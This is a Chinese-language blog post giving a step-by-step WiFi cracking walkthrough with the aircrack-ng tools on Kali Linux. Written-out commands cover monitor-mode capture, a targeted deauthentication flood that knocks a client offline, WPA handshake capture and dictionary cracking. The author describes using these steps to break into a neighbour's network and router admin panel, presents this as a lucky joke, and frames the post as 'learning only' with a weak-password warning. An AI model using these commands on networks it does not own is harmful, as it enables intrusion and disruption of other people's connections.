单纯记录学习,未进行破坏行为,未泄露对方信息
配置 / 工具:
- Kali Linux live
- airmon-ng airodump-ng aireplay-ng aircrack-ng
- USB 外置网卡
攻击对象
开始监听
- 需要网卡支持
montior
- 查看本机网卡信息
3. 启动监听模式
无线抓包
- 指定网卡
-w <filename>
指定记录的文件主题,将产生下列文件
1 2 3 4 5
| <filename>-<num>.csv <filename>-<num>.kismet.csv <filename>-<num>.kismet.netxml <filename>-<num>.log.csv <filename>-<num>.cap
|
- 存在过滤器只记录部分抓包信息
1 2 3 4 5 6 7 8
| Filter options: --encrypt <suite> : Filter APs by cipher suite --netmask <netmask> : Filter APs by mask --bssid <bssid> : Filter APs by BSSID --essid <essid> : Filter APs by ESSID --essid-regex <regex> : Filter APs by ESSID using a regular expression -a : Filter unassociated clients
|
DeAuth 攻击
De-authenticationFlood Attack
通过欺骗从AP到客户端单播地址的取消身份验证帧来将客户端转为未关联/未认证的状态
- 针对具体路由器下某个客户端进行攻击
1
| aireplay-ng -0 60 -a XX:XX:XX:XX:XX:XX -c OO:OO:OO:OO:OO:OO wlan0
|
抓获 WPA HandShake
- 在进行 DeAuth Attack 同时进行监听,通过攻击将用户打掉线之后自动重连捕获连接时的握手包,进行密码爆破(也可以慢慢等有新的用户自行链接)
1 2 3
| airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel <num> wlan0
# 须指定信道
|
- 当出现
WPA handshake: XX:XX:XX:XX:XX:XX
时证明抓包成功
爆破密码
- 准备大量字典(github 有很多),指定字典与流量包
1
| aircrack-ng XXX.cap -w XXX.dic
|
- 接下来就是运气,很凑巧,隔壁刚好是弱密码
弱密码好恐怖
- 已经拿到密钥了,连上看看,又是很凑巧,路由器用的和我一个牌子,那么直接进入后台了
怀疑是我安排的托
总结
千万不要用弱密码!!!
千万不要用弱密码!!!
千万不要用弱密码!!!
如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !